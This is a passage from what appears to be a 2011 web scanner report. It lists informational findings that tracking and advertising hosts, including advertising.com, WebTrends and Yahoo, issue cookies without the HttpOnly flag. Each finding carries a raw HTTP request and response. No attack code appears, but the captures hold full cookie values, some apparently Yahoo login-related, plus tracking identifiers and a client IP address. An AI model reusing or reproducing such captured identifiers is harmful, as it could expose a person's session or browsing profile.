GMT; Path=/
Last-Modified: Tue, 14 Jun 2011 00:13:54 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 14 Jun 2011 01:13:54 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 6038

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
12.27. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=1&betq=4544=381370 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; BASE=x7Q9Oi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0ibEOliUSEDbOxB!; ROLL=U6APCjO!; F1=BoSNk3kAAAAAnXzCAIAAgEA; C2=PAM7NFJwFsb0FCaqHLQCiZMSi+iAezihYtphC88BGe4sWJwYkaUbDqsAZPVxHOLiIcCqGAXrKLwJ3ZYbtKPCC0nBwxa8CwwcGbokCfASbXUqH0t1Fl6BLGeRpeAPaaUqHEb4Fl6BA9qRpeAZhXUqHskmGl6BBGeRpeA2kXUqHoLOGl6BYGeRpeAghXUqH0NYGl6B8LrRpeAUlZUqHgJaGl6BcbpRpeAhhXUqHUY4Fl6BEHoRpeQVrZUqHsN5Fl6BBHoRpegdeZUqHYZgGl6BC9qRpegCaaUqHEbmGl6BFBqRpeQziaUqHwbmGlKseKw7RaM3RGgAg2cBdHm5IaQa0KnAbzqxc3I9DsfzFETroNAPDa8xum/AHrpxHXAhTaIp2iLBqirxcPrZFMKpGS6sQVwSkaIplWsAT3jBo/KEHcHiGkG; GUID=MTMwNzM2MTI5NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:14:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Nfq9NFJwIob0FAXqHDQCiZ8Ki+CAezih7sphA88BGq2sWBwYkaEUDqMAZPVxqNLiGcCqGMVrKDwJ3ZIUtKvBC0nBTxa8AwwcGnmkCXASbXEjF0t1FxYBLGeRMWAPaaEjFEb4FxYBA9qRMWAZhXEjFskmGxYBBGeRMWA2kXEjFoLOGxYBYGeRMWAghXEjF0NYGxYB8LrRMWAUlZEjFgJaGxYBcbpRMWAhhXEjFUY4FxYBEHoRMWQVrZEjFsN5FxYBBHoRMWgdeZEjFYZgGxYBC9qRMWgCaaEjFEbmGxYBFBqRMWQziaEjFwbmGxIseCw7Ra8vRGAAg2cBA/l5IaAT0KHAbzqx/2I9BsfzFQRroFAPDasqumfAHrpxqOAhTa4h2irAqirx/OrZDMKpGe4sQNwSka4hlWMAT3jBL/KEFcHiGwE; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 14 Jun 2011 01:14:05 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
12.28. http://m.webtrends.com/dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif?&dcsdat=1308011655347&dcssip=windows.microsoft.com&dcsuri=/en-US/internet-explorer/products/ie/home&dcsref=http://www.microsoft.com/ie&WT.co_f=173.193.214.243-3661456592.30151123&WT.vtid=173.193.214.243-3661456592.30151123&WT.vtvs=1308011655276&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Internet%20Explorer&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x926&WT.fv=10.3&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=windows.microsoft.com%2Fen-US%2Finternet-explorer%2Fproducts%2Fie%2Fhome&WT.sli=Installed&WT.z_locale=en-us&WT.dcsvid=b99db294605ea749842ddaca50c2f3af&WT.z_anonid=AxUFAAAAAAB%2BCQAAAIpTytFFhH8oVryAJxM8%2Fw!!&WT.z_rioid=200024632-6%2F4%2F2011%2017%3A55%3A19&WT.z_MUID=E361C23374E642C998D8ABA7166A75EC&WT.vt_f_tlh=1308011655&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&WT.vt_nvr4=1&wtEvtSrc=windows.microsoft.com%2Fen-US%2Finternet-explorer%2Fproducts%2Fie%2Fhome&wtDrillDir=%2Fen-us%2F%3B%2Fen-us%2Finternet-explorer%2F%3B%2Fen-us%2Finternet-explorer%2Fproducts%2F%3B%2Fen-us%2Finternet-explorer%2Fproducts%2Fie%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAALAAAACgAAAI2/7E2Nv+xNfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBNBgAAABMAAACNv+xNjb/sTWYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAMAAAACgAAAI2/7E2Nv+xNfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIqs9k2IrPZNBgAAABMAAACKrPZNiKz2TWYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTQAAAAA-; path=/; expires=Fri, 11-Jun-2021 00:34:18 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
12.29. http://my.yahoo.com/e/df  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /e/df

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /e/df HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
Content-Length: 2094
Origin: http://my.yahoo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=Wtj.dCltxKKWR4yTxWi_CK3zDanzRVsKt8DTB2lpWI7zMVkiUsHadtRStTpEf2RsPhasVOexjjcF3fz81XvE4v.yNYuR.GBV3cPfQnU6y43PvH.k2AvYVaLo6yGHHOPZ_i5zjaWFBSQYbKhiX1uhCJ0xeDhAMtG6oI7N.XbXIymy8mseSmCJsUYNs2mNZA8Goqd6V7dmAQCh8Q_XdMSK2MPjzSi5v9CxVU0xOGdctWAsRnIMBPMlRFIRUh9Lx6w.lVHACtjxiB2yGToCqNbOBzwZ03riMmj3SE3sTBH84TjPrB7FHlSAUgMKgYL3clY8oEm7paKqf6Zj67HH4_M5gyBuN4FWEl2mUxPFQBnmQNw5AxvsPEfL0cdWt2fQHScYCxq35XuSkrdvkguLFYc_qGcqYGms1Fe2astRxElVMYNZUZ83IqqIaOHg4M6eIPdJRMj7Pusdir7jwPYovRuNefvFE6udsriCVQv6Qt7WxzmNKyQU3N9Xdj.ynSmNVze_TvL9eSmDdo79VDZMMlESsS66SZxkqUW5dbw4eZsSTqx5Yx1Y07hoMy3jQGCQAwW3VTD7DOZJ_Xt1Wy9ajjwKT4YQsAs0K.fqYiAHouD2nm0oIN4CV2Xo5rjMEOoJPDgYRklno2hDpWfjVrYrxHfskmnAW5QVe1Dew4djLXyT.3lpSFKNHORIrn8xgUsFRQHGe3e3crKUO7_.lpAt_vki&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAcKykQAEtfEABX5RAcfbgQDjXfEBxMJRAALUcQHG8IEA57Pw%3D%3D

_crumb=O2424dQlFYL1lvSkhHTkM.&_mode=json&_json=%5B%7B%22_action%22%3A%22show%22%2C%22_container%22%3A0%2C%22_id%22%3A%22ec0946%22%2C%22_tags%22%3A%5B%5D%2C%22_txnid%22%3A7%7D%2C%7B%22_action%22%3A%22s
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVkbjZxNWQ2dDA3OGIiO3M6MjoibXQiO2k6MTMwNzk3NDI2ODt9; expires=Thu, 13-Jun-2013 14:11:08 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 14:11:08 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Sun, 13-Jun-2010 14:11:08 GMT; path=/; domain=my.yahoo.com
Set-Cookie: myc_s=d=qXTRENJx0qLGl.Gxzy6uMMLlTUS25Kk5NwY9EGMgnCwhQAr9ycb.b_MtqYl59eEIn8yEIGX04_5xUD3696JPpUWLh.YHqYCPtFQQcRs3LeEPXfLCG26UktDuRgTRFdY9WmE7yK_vpGcYxsycmUf4.l9nM9_4WuNzxFMyQD7arxYTvNvAhhfoBuPXJtYmxGGvRTlTraqLbijiEj8RR1uAaP8ujkNWp5.PUe6nktTVB4r00g7bX94shYKLglTu9snU16MDrGWeN87SbZrjn5ur8jG4p9xbMo11NBB2unRtNAqMeCcfMcXJMsXFrVXxZEOonuso9lOAtLlpgjBMkXL_ECrPuhjk_RDBMm2kMTKcN4tv7tkjyGbXa6xQQQPM3fIVpb_IassvBf6uSOHd6QohIhMijjym9yVGFmmkMrbCSFEFdxPbmFb5EPURQn2S2GraEuM5.GuCxHdJcawyhTbSJBHHKWX9Qpxq_uZ.wZLic8tXkfS6sj5cECBpmWddAKgQutxz1BXObOtpkocO8hNFJOYql5ojE8sunP.nKztSZqi2KFgzIi1KLCfHhRYT5TaYftO2q4FuQefK3m0kWC.AGIHJ30hR_nm__f8nuOlevImsHyMeUTZ8xUkn8KE5fsgwHcL2kG7csaDskKc5Jd_erSF4HuWWi7JLvrGOcz40qYa8DaQgBLG9VNMvR7mg1kFq1z.2nKrzCTuEWt2AKenR&v=2; path=/; domain=my.yahoo.com
Set-Cookie: MYTMI=8; expires=Tue, 12-Jun-2012 14:11:08 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 120482

[{"state":{"view":"default","defer":false,"collapsed":0},"prefs":{"isc":0,"_mc":0},"data":{"mailpreviewhtml":"<div class=\"type_mails\">\n <div class=\"prheader\">\n <span class=\"strong from\">
...[SNIP]...
12.30. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?r=p&px=363&v=1&rnd=58424677746370430 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJE3NYfulixdXdQajAg==; UI=2b0be1156db673a127|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; ssrtb=0; LO=00Mn6F5rm1O00Kf500g0QhoGO4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MB6D8xm1O00Of500o0StcXwI; Domain=.opt.fimserve.com; Expires=Tue, 13-Sep-2011 00:13:57 GMT; Path=/
ETag: W/"43-1160088754000"
Last-Modified: Thu, 05 Oct 2006 22:52:34 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 14 Jun 2011 00:13:56 GMT

GIF89a.............!.......,...........L..;
12.31. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=MLvH+QcJZzpn51KdVPOgNEq4ycXXNAyCN+LRv9fsONVfRqt6Qn35QexQL31IlbitPCMvDwBMAQWU4RBAwCEMoMFFT0t18ir5y2YIZKsVf4A1MyV5pIzguYiK8y+o8zbIRZrZ9xyanQeHqcRo9uARt2M2hUoJyA1o3PPpYvAgJnquuQOveNt+kyObkCyOeLVAQBx3JPcv81M4vRIMnRw0wo58TG2ePQWa50SMXHxvrRIInkvJS+F5enSqgTnBr71q81exva1eOKPUWKTIz4VpYRcalFe1tKQ25zvzgpgRN4p9y95tlJNo1dKcS8E9JQa/aIYcsgrgCeb9HaHv61V3YFjJdwoln4Pcqz6Zdpf3dF3pQAJRSPTBwdbK1yjIYZ1HnH8PlbazgcDaHXlBte9YvNOMF9LUsvTCO9OtmnXFvaIJ8gm7AxzpQ6H6c5peDD4hh50s/S6dyey0uJnVJNGB9mudh6gl4xhA1gAn9TG2VaHUlSg/MZN4N4eOF6oZrw8tLZu6cPeYYeCrpQj/T6CBFEEP7hELSVaqziK1Ig5F0M76EO9h7CFMB9DJO9u28jcej/u6pVe9w4w0OGPEHexnmazLoPwbBbQg3WfdPF2DkI+4om/DZL0Os8CJSMakm6OuP3nItB64r8sfMpstkr7tWQevuO79HqbZThGOYcZpCcZ2dnxoU2qse4nhXnastPwh+AHpTlQ2TViAXBB3Vb/oMHPx2YzUJ0e/8qcTnlDGFTkcJF+FiqbzfFBGT1XQoJ5tbCsJSNN/0bJJYeZsryNG+cphBle1M3pnHwWbE0Ac5F+wi3qpofX/i8o+JPCkR73+7fZXp4cD8o9TVaMVs+1H5+5WrHcapiPyXjo/2u88tqI8W1eGozRtFBR/GkDIJaU1sDbyaA5WJqdXZ8a/3qKUtRNyzp9rxoqF+XkRAX45pBDT73AqfhAExsM14sPXvi5NVHH28JIua4pKod9lltgJXBYFgD19HPxU0ZE1DzqTVnnZ+cmLIg3Y8xUvgthgARtmiJCss+deTAWmQg99bc5VAEgS7WlFYgBc65REKq1h42sTf632vhHfEbkuX7FO/kEPTjREzcmgEEmj6PfU+DqIGMWgmiUW7IJb2dvvA0jbfQH9cPxn4MATH+0y0Zb1m0wasEnPVxmvh/HRAFaVctanOU35/ErLXSzIByXHZyg7na2o07eicOqHCaq00wrvQxUSYV+oxNq6NDuMfLka4Se9gTjw9ZZMj63R5Bly2VCZnnvU33jTGcPtz2wBRLDyRjzDlALCzcxI/NCA1Kkm6joZHwlZU4Jr6SLMVKxlDrl5eSGkA6qwGUo7I1ZDjlid/k47g0ld7KJWZIRG6oUAjl0wT9ANgf4d7UDmSUnVXT8TaPnnKl+7DF6ID6pghiFIYKBnIcIltk+3WO5r316iq34xREuAyhLzvwn4AoNXbEuSDQirEtkRsqC9yghnhNCABZMLBvxyPptwHbvT4weL5k6PwCsDrdRFMLapAvP00t8HZynDglCUyW5YJhpNhMsj8rRMcrTHiio95XzpYQVICbRfxvuAGI4w+qoaJxndiQ0mwnayN8s7AVc3X9pDkKlKPXDarNuJ/EARWPRfcxJy18d++UkPeTX60moLBcxP4mHPFrlwOSQ4+Qyc1B7NXrg2xwBlmlZnc/vy3Fi31gon/6p7zhOIxDCGiKwEFknz7vadgGqld1cLwqzH6OhAfY8jsa8p/26SOjOygKEBIgsrm+13EcEK+6PNyPsimfyFeYkUHabdz8dGftnMPLgf7+B8Zx14LqwoUkwEzF4omy4BUQUOm2iPErATdY015XBw/3ngiiZYGnwMjyKAYQ6Go969u6BjTqw1Dlng/CNJPq7KdHKtbhWeDZIswWfS+UXRS226Ov8g5X+6P2i7NhxTKJbnBNDPHleNXzq+KRB/tUMjhb+TyiAfkxVF2E2L3v5xUy221azIhh7ArlMe3ZXI7sXJlF0YqHE/fsVdNop89QLOCGlS2np1IqezLb7srY/u9dJepf/59b38dqo3zGkfUdtHC8MK0MM4gGjo2su0M8iS+RWiOUs4V30Py9KJ+qjnOkhJMjIZvZ5R/sfHr78ja97y6gpUz6sLuYOUsD1JY6XZxF9mXiOn8pGzt3QGrPV5unR/EPPonFSA6Oj6Ei8ImLz7WprXeIljuzyKYZ5azxgfeA==; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; 